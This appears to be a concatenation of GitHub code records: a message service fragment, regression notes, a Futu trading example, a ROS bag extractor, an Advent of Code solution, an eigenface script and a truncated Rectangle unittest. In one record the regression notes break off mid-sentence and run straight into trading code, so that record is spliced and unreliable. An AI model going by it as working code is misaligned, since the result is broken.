)\n\n def create_message_builder(self) -> MessageBuilder:\n \"\"\"\n Creates a new message builder.\n\n Returns:\n The newly created message builder.\n \"\"\"\n return MessageBuilder(self._component_id, self._message_bus)\n\n @property\n def message_handlers(self) -> MessageHandlers:\n \"\"\"\n The message handlers maintained by this message service.\n \"\"\"\n return self._message_handlers\n","repo_name":"Sciebo-RDS/rds-ng","sub_path":"src/common/py/core/messaging/handlers/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"41239689751","text":"\n'''\n# y = b0 (for profit) + b1.x1 (for r&d) + b2.x2 (for admin) + b3.x3 (marketing) + b4.D1 (state is categorical)\n# D1: to achieve correct regression, you need to convert the state column to categories of 0/1 for each value in it.\n# you should use only 1 dummy variable (for example you choose newyork only and use 0/1)\n# always omit one dummy variable (if you have 3 use 2, if you have 100 use 99)\n'''\n\n'''\n#backward elimination\nstep1: set a significance level to stay in the model; say SL=0.05\nstep2: fit the model with all possible predictors\nstep3: consider the predictor with the highest p-value, if p>SL, go to step4, otherwise end\nstep4: remove the predictor\nstep5: go to step2\nend\n'''\n\n'''\n#forward selection\nstep1: select significance level\nstep2: fit all simple regression models, select the one with the lowest p-value\nstep3: keep this variable and fit all possible models with one extra predictor added to the one(s) you already have\nstep4: consider the predictor with the lowest p-value, if p 0:\n        holding_position = data['qty'][0]\n        print('Position {} {}'.format(code, holding_position))\n    return holding_position\n\ndef get_ask_and_bid(code):\n    ret, data = quote_context.get_order_book(code, num=1)\n    if ret != RET_OK:\n        print('No L1 for ', code, data)\n        return None, None\n    return data['Ask'][0][0], data['Bid'][0][0]\n\ndef is_valid_quantity(code, quantity, price):\n    ret, data = trade_context.acctradinginfo_query(\n        order_type=OrderType.NORMAL, code=code, price=price,\n        trd_env=TRADING_ENVIRONMENT)\n    if ret != RET_OK:\n        print('Failed in getting valid qty', code, data)\n        return False\n    max_can_buy = data['max_cash_buy'][0]\n    max_can_sell = data['max_sell_short'][0]\n    if quantity > 0:\n        return quantity < max_can_buy\n    elif quantity < 0:\n        return abs(quantity) < max_can_sell\n    return False\n\ndef show_order_status(data):\n    order_status = data['order_status'][0]\n    order_info = dict()\n    order_info['code'] = data['code'][0]\n    order_info['price'] = data['price'][0]\n    order_info['side'] = data['trd_side'][0]\n    order_info['qty'] = data['qty'][0]\n    print('status', order_status, order_info)\n\ndef test_buy_trade(code):\n    ask, bid = get_ask_and_bid(code)\n    open_quantity = 100\n    if is_valid_quantity(code, open_quantity, ask) == False:\n        print('Order quantity beyond valid amount.')\n        return None\n    ret, data = trade_context.place_order(\n        price=ask, qty=open_quantity, code=code, trd_side=TrdSide.BUY,\n        order_type=OrderType.NORMAL, trd_env=TRADING_ENVIRONMENT,\n        remark='moving_average_strategy')\n    if ret != RET_OK:\n        print('Failed in placing order', data)\n\n############################ Callbacks ############################\ndef on_init():\n    if not unlock_trade():\n        return False\n    print('************ ON_INIT ***********')\n    return True\n\nEXAMPLE_CODE = 'HK.09618'\nif __name__ == '__main__':\n    if not on_init():\n        print('Failed in on_init()')\n        quote_context.close()\n        trade_context.close()\n    print('Do something here')\n    list_accounts()\n    trading_rules(EXAMPLE_CODE)\n    account_info()\n    recent_orders()\n    is_normal_trading_time(EXAMPLE_CODE)\n    list_position()\n","repo_name":"ziwei-yang/futu_mclient","sub_path":"trader/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
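The backward-elimination recipe in the notes above is commonly run with statsmodels. A hedged sketch (the helper name and the toy X, y data are illustrative, not from the original file): each pass fits OLS on all remaining predictors and drops the one with the highest p-value until everything left is below the significance level.

```python
import numpy as np
import statsmodels.api as sm

def backward_elimination(X, y, sl=0.05):
    X = sm.add_constant(X)                     # b0 column of ones
    while X.shape[1] > 1:
        model = sm.OLS(y, X).fit()             # step 2: fit all predictors
        worst = int(np.argmax(model.pvalues))  # step 3: highest p-value
        if model.pvalues[worst] <= sl:
            return model                       # everything significant: done
        X = np.delete(X, worst, axis=1)        # step 4: drop it, go to step 2
    return sm.OLS(y, X).fit()

# toy data: y depends on the first column only
rng = np.random.default_rng(0)
X = rng.normal(size=(100, 3))
y = 3 * X[:, 0] + rng.normal(size=100)
print(backward_elimination(X, y).params)       # keeps the informative column
```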
+{"seq_id":"27885927138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# python extract_image.py \n# --bag * \n# --image_topics * \n# --imu_topics * \n# --gnss_topics * \n# --uwb_topics * \n# --gt_topics * \n# --output_folder ?(~/Desktop/)\n\nimport os\nimport argparse\nimport cv2\nimport sys\nimport rosbag\n\nfrom cv_bridge import CvBridge\n\ndef bag2image(bag=str, image_topic=str, output_folder=str):\n # support an image topic\n\n print(\"Extract images from %s on topic %s into %s\" % (bag, image_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n bridge = CvBridge()\n count = 0\n for topic, msg, t in bag_to_read.read_messages(topics=image_topic):\n\t# for img raw\n cv_img = bridge.imgmsg_to_cv2(msg, desired_encoding=\"passthrough\")\n\t# for img compressed \n\t# cv_img = bridge.compressed_imgmsg_to_cv2(msg, desired_encoding=\"passthrough\")\n\n timestr=\"%d\"%(msg.header.stamp.to_sec()*1e9)\n\t\n\t#img filename: frame+num\n # cv2.imwrite(os.path.join(args.output_dir, \"frame%06i.png\" % count), cv_img)\n\t#img filename: rostime ns\n cv2.imwrite(os.path.join(output_folder,timestr+\".jpg\"), cv_img)\n\n print(\"Wrote image %i\" % count)\n count += 1\n\n bag_to_read.close()\n\n return\n\ndef bag2imu(bag=str, imu_topic=str, output_folder=str):\n # support an imu topic\n\n print(\"Extract imu records from %s on topic %s into %s\" % (bag, imu_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n imu = open(os.path.join(output_folder,\"imu.txt\"),\"w\")\n for topic, msg, t in bag_to_read.read_messages(topics=imu_topic):\n\n acc_y = \"%.10f\" % msg.linear_acceleration.y\n acc_x = \"%.10f\" % msg.linear_acceleration.x\n acc_z = \"%.10f\" % msg.linear_acceleration.z\n w_y = \"%.10f\" % msg.angular_velocity.y\n w_x = \"%.10f\" % msg.angular_velocity.x\n w_z = \"%.10f\" % msg.angular_velocity.z\n\n timestr=\"%.6f\"%(msg.header.stamp.to_sec())\n\n imudata = timestr + \" \" + w_x + \" \" + w_y + \" \" + w_z + \" \" + acc_x + \" \" + acc_y + \" \" + acc_z\n imu.write(imudata)\n imu.write('\\n')\n bag_to_read.close()\n\n return\n\ndef bag2gnss(bag=str, gnss_topic=str, output_folder=str):\n # support an gnss topic\n\n print(\"Extract gnss records from %s on topic %s into %s\" % (bag, gnss_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n gnss = open(os.path.join(output_folder,\"gnss.txt\"),\"w\")\n for topic, msg, t in bag_to_read.read_messages(topics=gnss_topic):\n\n pos_x = \"%.10f\" % msg.latitude\n pos_y = \"%.10f\" % msg.longitude\n pos_z = \"%.10f\" % msg.altitude\n v0=\"%.6f\" % msg.position_covariance[0]\n v1=\"%.6f\" % msg.position_covariance[1]\n v2=\"%.6f\" % msg.position_covariance[2]\n v3=\"%.6f\" % msg.position_covariance[3]\n v4=\"%.6f\" % msg.position_covariance[4]\n v5=\"%.6f\" % msg.position_covariance[5]\n v6=\"%.6f\" % msg.position_covariance[6]\n v7=\"%.6f\" % msg.position_covariance[7]\n v8=\"%.6f\" % msg.position_covariance[8]\n\n timestr=\"%.6f\"%(msg.header.stamp.to_sec())\n\n gnssdata = timestr + \" \" + pos_x + \" \" + pos_y + \" \" + pos_z + \" \"+v0+ \" \"+v1+ \" \"+v2+ \" \"+v3+ \" \"+v4+ \" \"+v5+ \" \"+v6+ \" \"+v7+ \" \"+v8\n gnss.write(gnssdata)\n gnss.write('\\n')\n bag_to_read.close()\n\ndef bag2uwb(bag=str, uwb_topic=str, output_folder=str):\n # support an uwb topic\n # from uwb_driver.msg import UwbRange # Install from https://github.com/ntu-aris/uwb_driver\n\n # Header header # ROS header\n # uint16 msgId # Message ID handled by p4xx automatically\n # uint8 requester_id # Identity number of the requesting P4xx\n # 
uint8 responder_id # Identity number of the responding P4xx\n # int8 requester_idx # Index number of the node in the responding array passed by rosparam\n # int8 responder_idx # Index number of the node in the responding array passed by rosparam\n # uint8 range_status # Status/error codes for the range conversation\n # uint8 antenna # Antenna where the measurement was carried out\n # uint16 stopwatch_time # How long the range conversation took, in ms\n # float32 distance # Distance measurement using ToF\n # float32 coarse_range # Distance measurement using signal strength\n # float32 filtered_range # Distance measurement using filter\n # float32 distance_err # Distance error estimate\n # float32 coarse_range_err # Coarse range error\n # float32 filtered_range_err # Filter range error\n # float32 distance_dot # Range velocity estimated by Pxx\n # float32 distance_dot_err # Range velocity error estimated by Pxx\n # uint8 range_meas_type # Range measurement type\n # uint16 requester_LED_flag # requester's received scan: 16 for NLS\n # uint16 responder_LED_flag # responder's received scan: 16 for NLS\n # uint16 noise # Noise\n # uint16 vPeak # Absolute maximum value in the leading edge window of the received waveform\n # int32 coarse_tof_in_bins # Coarse tof in bins\n # uint32 uwb_time # ms since radio boot at the time of the range conversation nb\n # geometry_msgs/Point requester_location # Location of the requester node if known (explicitly declared as anchor by rosparam), otherwise 99999 indicates unknown.\n # geometry_msgs/Point responder_location # Location of the responder node if known (explicitly declared as anchor by rosparam), otherwise 99999 indicates unknown.\n # geometry_msgs/Point rqst_antenna_offset # Location of the antenna in the body frame of the requester.\n # geometry_msgs/Point rspd_antenna_offset # Location of the antenna in the body frame of the responder.\n\n print(\"Extract uwb records from %s on topic %s into %s\" % (bag, uwb_topic, output_folder))\n bag_to_read = rosbag.Bag(bag,'r')\n uwb = open(os.path.join(output_folder,\"uwb.csv\"),\"w\")\n\n uwb.write(\"timeUWB\" +\",\"+\\\n \"msgId\" +\",\"+\\\n \"requester_id\" +\",\"+\\\n \"responder_id\" +\",\"+\\\n \"requester_idx\" +\",\"+\\\n \"responder_idx\" +\",\"+\\\n \"range_status\" +\",\"+\\\n \"antenna\" +\",\"+\\\n \"stopwatch_time\" +\",\"+\\\n \"distance\" +\",\"+\\\n \"coarse_range\" +\",\"+\\\n \"filtered_range\" +\",\"+\\\n \"distance_err\" +\",\"+\\\n \"coarse_range_err\" +\",\"+\\\n \"filtered_range_err\" +\",\"+\\\n \"distance_dot\" +\",\"+\\\n \"distance_dot_err\" +\",\"+\\\n \"range_meas_type\" +\",\"+\\\n \"requester_LED_flag\" +\",\"+\\\n \"responder_LED_flag\" +\",\"+\\\n \"noise\" +\",\"+\\\n \"vPeak\" +\",\"+\\\n \"coarse_tof_in_bins\" +\",\"+\\\n \"uwb_time\" +\",\"+\\\n \"requester_locationx\" +\",\"+\\\n \"requester_locationy\" +\",\"+\\\n \"requester_locationz\" +\",\"+\\\n \"responder_locationx\" +\",\"+\\\n \"responder_locationy\" +\",\"+\\\n \"responder_locationz\" +\",\"+\\\n \"rqst_antenna_offsetx\"+\",\"+\\\n \"rqst_antenna_offsety\"+\",\"+\\\n \"rqst_antenna_offsetz\"+\",\"+\\\n \"rspd_antenna_offsetx\"+\",\"+\\\n \"rspd_antenna_offsety\"+\",\"+\\\n \"rspd_antenna_offsetz\"\n )\n uwb.write(\"\\n\")\n for topic, msg, t in bag_to_read.read_messages(topics=uwb_topic):\n timeUWB = \"%.6f\" % msg.header.stamp.to_sec()\n msgId = str(msg.msgId ) \n requester_id = str(msg.requester_id ) \n responder_id = str(msg.responder_id ) \n requester_idx = str(msg.requester_idx ) \n responder_idx = 
str(msg.responder_idx ) \n range_status = str(msg.range_status ) \n antenna = str(msg.antenna ) \n stopwatch_time = str(msg.stopwatch_time) \n distance = \"%.6f\"%msg.distance \n coarse_range = \"%.6f\"%msg.coarse_range \n filtered_range = \"%.6f\"%msg.filtered_range \n distance_err = \"%.6f\"%msg.distance_err \n coarse_range_err = \"%.6f\"%msg.coarse_range_err \n filtered_range_err = \"%.6f\"%msg.filtered_range_err \n distance_dot = \"%.6f\"%msg.distance_dot \n distance_dot_err = \"%.6f\"%msg.distance_dot_err \n range_meas_type = str(msg.range_meas_type ) \n requester_LED_flag = str(msg.requester_LED_flag) \n responder_LED_flag = str(msg.responder_LED_flag) \n noise = str(msg.noise ) \n vPeak = str(msg.vPeak ) \n coarse_tof_in_bins = str(msg.coarse_tof_in_bins) \n uwb_time = str(msg.uwb_time ) \n requester_locationx =\"%.6f\" %msg.requester_location.x \n requester_locationy =\"%.6f\" %msg.requester_location.y \n requester_locationz =\"%.6f\" %msg.requester_location.z \n responder_locationx =\"%.6f\" %msg.responder_location.x \n responder_locationy =\"%.6f\" %msg.responder_location.y \n responder_locationz =\"%.6f\" %msg.responder_location.z \n rqst_antenna_offsetx=\"%.6f\" %msg.rqst_antenna_offset.x\n rqst_antenna_offsety=\"%.6f\" %msg.rqst_antenna_offset.y\n rqst_antenna_offsetz=\"%.6f\" %msg.rqst_antenna_offset.z\n rspd_antenna_offsetx=\"%.6f\" %msg.rspd_antenna_offset.x \n rspd_antenna_offsety=\"%.6f\" %msg.rspd_antenna_offset.y \n rspd_antenna_offsetz=\"%.6f\" %msg.rspd_antenna_offset.z \n\n uwbData = \\\n timeUWB +\",\"+\\\n msgId +\",\"+\\\n requester_id +\",\"+\\\n responder_id +\",\"+\\\n requester_idx +\",\"+\\\n responder_idx +\",\"+\\\n range_status +\",\"+\\\n antenna +\",\"+\\\n stopwatch_time +\",\"+\\\n distance +\",\"+\\\n coarse_range +\",\"+\\\n filtered_range +\",\"+\\\n distance_err +\",\"+\\\n coarse_range_err +\",\"+\\\n filtered_range_err +\",\"+\\\n distance_dot +\",\"+\\\n distance_dot_err +\",\"+\\\n range_meas_type +\",\"+\\\n requester_LED_flag +\",\"+\\\n responder_LED_flag +\",\"+\\\n noise +\",\"+\\\n vPeak +\",\"+\\\n coarse_tof_in_bins +\",\"+\\\n uwb_time +\",\"+\\\n requester_locationx +\",\"+\\\n requester_locationy +\",\"+\\\n requester_locationz +\",\"+\\\n responder_locationx +\",\"+\\\n responder_locationy +\",\"+\\\n responder_locationz +\",\"+\\\n rqst_antenna_offsetx+\",\"+\\\n rqst_antenna_offsety+\",\"+\\\n rqst_antenna_offsetz+\",\"+\\\n rspd_antenna_offsetx+\",\"+\\\n rspd_antenna_offsety+\",\"+\\\n rspd_antenna_offsetz\n uwb.write(uwbData)\n uwb.write(\"\\n\")\n bag_to_read.close()\n\n return\n\ndef bag2gt(bag=str, gt_topic=str, output_folder=str):\n # support an gt topic\n\n print(\"Extract gt records from %s on topic %s into %s\" % (bag, gt_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n gt = open(os.path.join(output_folder,\"PoseStamped.txt\"),\"w\")\n for topic, msg, t in bag_to_read.read_messages(topics=gt_topic):\n\n pos_y = \"%.6f\" % msg.pose.position.y\n pos_x = \"%.6f\" % msg.pose.position.x\n pos_z = \"%.6f\" % msg.pose.position.z\n q_y = \"%.10f\" % msg.pose.orientation.y\n q_x = \"%.10f\" % msg.pose.orientation.x\n q_z = \"%.10f\" % msg.pose.orientation.z\n q_w = \"%.10f\" % msg.pose.orientation.w\n\n timestr=\"%.6f\"%(msg.header.stamp.to_sec())\n\n gtdata = timestr + \" \" + pos_x + \" \" + pos_y + \" \" + pos_z + \" \" + q_x + \" \" + q_y + \" \" + q_z + \" \" + q_w\n gt.write(gtdata)\n gt.write('\\n')\n bag_to_read.close()\n\n return\n\ndef main():\n parser = argparse.ArgumentParser(description='Extract a 
ROS bag containing multiple image and imu topics.')\n parser.add_argument('--bag', metavar='bag', help='ROS bag file')\n parser.add_argument('--image_topics', metavar='image_topics', nargs='*', help='Image topics %(default)s')\n parser.add_argument('--imu_topics', metavar='imu_topics', nargs='*', help='Imu topics %(default)s')\n parser.add_argument('--gnss_topics', metavar='gnss_topics', nargs='*', help='Gnss topics %(default)s')\n parser.add_argument('--uwb_topics', metavar='uwb_topics', nargs='*', help='Uwb topics %(default)s')\n parser.add_argument('--gt_topics', metavar='gt_topics', nargs='*', help='Gt topics %(default)s')\n parser.add_argument('--output_folder', metavar='output_folder', nargs='?', default=\"~/Desktop/\", help='Output folder %(default)s')\n\n args = parser.parse_args()\n print(\"Extract images from %s on topic %s into %s\" % (args.bag, args.image_topics, args.output_folder))\n #print help if no argument is specified\n if len(sys.argv)<2:\n parser.print_help()\n sys.exit(0)\n\n image_id=0\n if not args.image_topics is None:\n print(\"cam number: \"+str(len(args.image_topics)))\n for image_topic in args.image_topics:\n #create output folder\n try:\n output_folder=os.path.join(args.output_folder,\"img\"+str(image_id),\"data\")\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process cam \"+str(image_id)+\" (topic: \"+image_topic+\", path: \"+output_folder+\")\")\n bag2image(args.bag, image_topic, output_folder)\n image_id=image_id+1\n print(\"finish process cam \"+str(image_id)+\" (topic: \"+image_topic+\")\")\n else:\n print(\"-----WARNING: no cam topic given ! -----\")\n\n imu_id=0\n if not args.imu_topics is None:\n print(\"imu number: \"+str(len(args.imu_topics)))\n for imu_topic in args.imu_topics:\n output_folder=os.path.join(args.output_folder,\"imu\"+str(imu_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process imu \"+str(imu_id)+\" (topic: \"+imu_topic+\", path: \"+output_folder+\")\")\n bag2imu(args.bag, imu_topic, output_folder)\n imu_id=imu_id+1\n print(\"finish process imu \"+str(imu_id)+\" (topic: \"+imu_topic+\")\")\n else:\n print(\"-----WARNING: no imu topic given ! -----\")\n \n gnss_id=0\n if not args.gnss_topics is None:\n print(\"gnss number: \"+str(len(args.gnss_topics)))\n for gnss_topic in args.gnss_topics:\n output_folder=os.path.join(args.output_folder,\"gnss\"+str(gnss_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process gnss \"+str(gnss_id)+\" (topic: \"+gnss_topic+\", path: \"+output_folder+\")\")\n bag2gnss(args.bag, gnss_topic, output_folder)\n gnss_id=gnss_id+1\n print(\"finish process gnss \"+str(gnss_id)+\" (topic: \"+gnss_topic+\")\")\n else:\n print(\"-----WARNING: no gnss topic given ! -----\")\n\n uwb_id=0\n if not args.uwb_topics is None:\n print(\"uwb number: \"+str(len(args.uwb_topics)))\n for uwb_topic in args.uwb_topics:\n output_folder=os.path.join(args.output_folder,\"uwb\"+str(uwb_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! 
-----\")\n pass\n print(\"start process uwb \"+str(uwb_id)+\" (topic: \"+uwb_topic+\", path: \"+output_folder+\")\")\n bag2uwb(args.bag, uwb_topic, output_folder)\n uwb_id=uwb_id+1\n print(\"finish process uwb \"+str(uwb_id)+\" (topic: \"+uwb_topic+\")\")\n else:\n print(\"-----WARNING: no uwb topic given ! -----\")\n\n gt_id=0\n if not args.gt_topics is None:\n print(\"gt number: \"+str(len(args.gt_topics)))\n for gt_topic in args.gt_topics:\n output_folder=os.path.join(args.output_folder,\"gt\"+str(gt_id))\n #create output folder\n try:\n os.makedirs(output_folder)\n except:\n print(\"-----WARNING: \"+output_folder+\" cannot be made ! -----\")\n pass\n print(\"start process gt \"+str(gt_id)+\" (topic: \"+gt_topic+\", path: \"+output_folder+\")\")\n bag2gt(args.bag, gt_topic, output_folder)\n gt_id=gt_id+1\n print(\"finish process gt \"+str(gt_id)+\" (topic: \"+gt_topic+\")\")\n else:\n print(\"-----WARNING: no gt topic given ! -----\")\n\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"zzwu29/bag_scripts","sub_path":"bag_extractor.py","file_name":"bag_extractor.py","file_ext":"py","file_size_in_byte":17582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26799987519","text":"currentDegrees = 0\neastPos = 0\nnorthPos = 0\n\ndef rotate(dir, degrees):\n global currentDegrees\n if dir == 'L':\n degrees = 360 - degrees\n currentDegrees += degrees\n currentDegrees = currentDegrees % 360\n\ndef move(dir, dist):\n global eastPos, northPos\n if dir == 'L' or dir == 'R':\n #print(\"rotating \" + dir + str(dist))\n rotate(dir, dist)\n #print(\"new degrees: \" + str(currentDegrees))\n return\n\n if dir == 'F':\n if currentDegrees == 90:\n dir = 'S'\n elif currentDegrees == 180:\n # This dumb W right here\n dir = 'W'\n elif currentDegrees == 270:\n dir = 'N'\n else:\n dir = 'E'\n\n if dir == 'N':\n #print(\"north \" + str(dist))\n northPos += dist\n elif dir == 'S':\n #print(\"south \" + str(dist))\n northPos -= dist\n elif dir == 'E':\n #print(\"east \" + str(dist))\n eastPos += dist\n elif dir == 'W':\n #print(\"west \" + str(dist))\n eastPos -= dist\n #print(\"(\" + str(eastPos) + \", \" + str(northPos) + \", \" + str(currentDegrees) + \")\")\n\nwith open(\"input.txt\") as input:\n for line in input:\n move(line[0], int(line[1:]))\n\nprint(abs(eastPos) + abs(northPos))\n","repo_name":"hrecker/AdventOfCode","sub_path":"2020/day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26163420537","text":"# a) Description:\n\n# b) Implementation: We start with two arrays, hunger_level and biscuit_size. First, we will sort these arrays with\n# Python's sort() function. Then, we need to initialize two variables: one that will hold the number of dogs that can\n# fed and a counter. Initialize both to 0. Then, we will iterate through both arrays to find the current positions of\n# both dog and biscuit. If the biscuit size is greater than or equal to the hunger level of the dog, then the dog is\n# able to be fed so we increment the number of dogs and continue to the next dog and next biscuit. However, if the\n# biscuit_index is at the same index of the hunger_level, we cannot feed any more dogs and we return our completed list\n# of dogs we can feed.\n\ndef feedDog(hunger_level, biscuit_size):\n \"\"\"\n This function computes the maximum number of hungry dogs by implementing a Greedy algorithm that finds the number\n of dogs we can satisfy. If a dog has hunger hunger_level[i], it can be satisfied only by taking a biscuit of size\n biscuit_size [j] >= hunger_level [i]\n \"\"\"\n\n hunger_level.sort()\n biscuit_size.sort()\n # make sure arrays are sorted\n\n num_dogs = 0\n num_bisc = 0\n\n length = len(hunger_level)\n\n for biscuit_index in biscuit_size:\n for hunger_index in range(num_bisc, length):\n # start to iterate through both of our arrays\n if hunger_level[hunger_index] <= biscuit_index:\n # if dog hunger index in d hunger array is > or = to the num of biscuits increment number of dogs and\n # counter\n num_dogs = num_dogs + 1\n num_bisc = num_bisc + 1\n elif length == hunger_index:\n # end of the index\n return num_dogs\n\n return num_dogs\n# return our final count\n\n\n\n################ TESTING PURPOSES #############\n# hunger_level =[1, 2, 3]\n# biscuit_size =[1, 1]\n# test = feedDog(hunger_level, biscuit_size)\n# print(test)\n\n\n\n# c) Time-Complexity:\n# Because I used Python's built in sort() method, the time-complexity is O(nLogn) also known as TimSort. I have included\n# citations below for reference:\n# https://www.geeksforgeeks.org/timsort/\n# https://medium.com/@rylanbauermeister/understanding-timsort-191c758a42f3\n","repo_name":"vzavala95/Algorithms","sub_path":"FeedDog.py","file_name":"FeedDog.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39561460657","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport imageio\nimport os\n\ndef load_images_from_folder(folder):\n \"\"\" load all images in the folder\n \"\"\"\n images = []\n for filename in os.listdir(folder):\n img = cv2.imread(os.path.join(folder,filename), cv2.IMREAD_GRAYSCALE)\n images.append(img)\n return images\n\nimages = load_images_from_folder('trainingset')\nimages = np.array(images)\ntrain_images = images\nn, h, w = images.shape\nd = h * w\nX = np.reshape(images, (n, d)).copy() # each row represents an image\n\ndef plot_image(image):\n \"\"\" Visualise an image using matplotlib\n \"\"\"\n image = np.reshape(image, (h, w))\n plt.figure(figsize=(4,4))\n plt.imshow(image, cmap='gray')\n #plt.savefig('../../Report/figures/fig_3.6_{}.eps'.format(i+1), dpi=100, format='eps')\n plt.show()\n\n# %% Calculate the mean face\nmean_face = np.mean(X, axis=0)\nplot_image(mean_face)\n\n# %% Subtract the mean face\nA = X - mean_face\n\n# %% Compute covariance matrix\ncov_matrix = A @ A.T\ncov_matrix /= n\neigenvalues, eigenvectors = np.linalg.eig(cov_matrix)\neigenvectors = A.T @ eigenvectors\n# sort in descending order\nsort_indices = eigenvalues.argsort()[::-1]\neigenvalues = eigenvalues[sort_indices]\neigenvectors = eigenvectors[:,sort_indices]\n# Choose top k eigenvectors\nk = 10\neigenvalues = eigenvalues[:k]\neigenvectors = eigenvectors[:,:k]\nnorms = np.linalg.norm(eigenvectors, axis=0)\neigenvectors /= norms\nweights = eigenvectors.T @ X.T\n\n# %% Visualise the top eigenfaces\nfor i in range(k):\n plot_image(np.real(eigenvectors.T[i]))\n\n# %% Find the top 3 closest image to images in the test set\n\ntest_images = load_images_from_folder('testset')\n# test_images = load_images_from_folder('mytestset') # Use my own images\ntest_images = np.array(test_images)\nn, h, w = test_images.shape\nd = w * h\ntest_images = np.reshape(test_images, (n, d))\ni = 0\nfor image in test_images:\n plot_image(image)\n A_unknown = image - mean_face\n W_unknown = eigenvectors.T @ image\n diff = weights.T - W_unknown\n norms = np.linalg.norm(diff, axis=1)\n nearest = np.argsort(norms)[:3]\n plt.figure(figsize=(7,3))\n for j in range(3):\n image = train_images[nearest[j]]\n ax = plt.subplot(1, 3, j+1)\n ax.imshow(image, cmap='gray')\n #plt.savefig('../../Report/figures/fig_3.6_{}o.eps'.format(i+1), dpi=100, format='eps')\n plt.show()\n i += 1\n print('')\n","repo_name":"ernestkck/computer-vision-lab","sub_path":"Task3/Yale-FaceA/eigenface.py","file_name":"eigenface.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2135418034","text":"#!/usr/bin/python3\n\"\"\"\nTest rectangle\n\"\"\"\nimport unittest\nimport os\nfrom models.rectangle import Rectangle\nfrom models.base import Base\nfrom io import StringIO\nfrom contextlib import redirect_stdout\n\nclass Test_Rectangle(unittest.TestCase):\n def test_init(self):\n \"\"\"\n Test instance attributes\n \"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(r.id, 18)\n self.assertEqual(r.width, 8)\n self.assertEqual(r.height, 6)\n self.assertEqual(r.x, 4)\n self.assertEqual(r.y, 2)\n r = Rectangle(1, 2)\n self.assertEqual(r.width, 1)\n self.assertEqual(r.height, 2)\n\n def test_type_error_init(self):\n \"\"\"\n Test TypeError\n \"\"\"\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(\"8\", 6, 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"width must be an integer\")\n\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(8, \"6\", 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"height must be an integer\")\n\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(8, 6, \"4\", 2, 18)\n\n self.assertEqual(str(cm.exception), \"x must be an integer\")\n\n with self.assertRaises(TypeError) as cm:\n r1 = Rectangle(8, 6, 4, \"2\", 18)\n\n self.assertEqual(str(cm.exception), \"y must be an integer\")\n\n def test_value_error_init(self):\n \"\"\"\n Test ValueError\n \"\"\"\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(-8, 6, 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"width must be > 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(8, -6, 4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"height must be > 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(8, 6, -4, 2, 18)\n\n self.assertEqual(str(cm.exception), \"x must be >= 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(8, 6, 4, -2, 18)\n\n self.assertEqual(str(cm.exception), \"y must be >= 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(0, 2)\n\n self.assertEqual(str(cm.exception), \"width must be > 0\")\n\n with self.assertRaises(ValueError) as cm:\n r1 = Rectangle(1, 0)\n\n self.assertEqual(str(cm.exception), \"height must be > 0\")\n\n def test_area(self):\n \"\"\"\n Test area\n \"\"\"\n r2 = Rectangle(3, 2)\n self.assertEqual(r2.area(), 6)\n\n def test_str(self):\n \"\"\"\n Test str\n \"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(str(r), \"[Rectangle] (18) 4/2 - 8/6\")\n\n def test_display(self):\n \"\"\"\n Test display rectangle\n \"\"\"\n r3 = Rectangle(3, 2)\n expected_output = \"###\\n###\\n\"\n with StringIO() as buffer, redirect_stdout(buffer):\n r3.display()\n result = buffer.getvalue()\n self.assertEqual(result, expected_output)\n\n r3 = Rectangle(3, 2, 1, 1)\n expected_output = \"\\n ###\\n ###\\n\"\n with StringIO() as buffer, redirect_stdout(buffer):\n r3.display()\n result = buffer.getvalue()\n self.assertEqual(result, expected_output)\n\n def test_update(self):\n \"\"\"\n Test update\n \"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n r.update(89, 10, 10, 10, 10)\n self.assertEqual(r.id, 89)\n self.assertEqual(r.width, 10)\n self.assertEqual(r.height, 10)\n self.assertEqual(r.x, 10)\n self.assertEqual(r.y, 10)\n\n def test_dictionary(self):\n \"\"\"\n Test dictionary\n 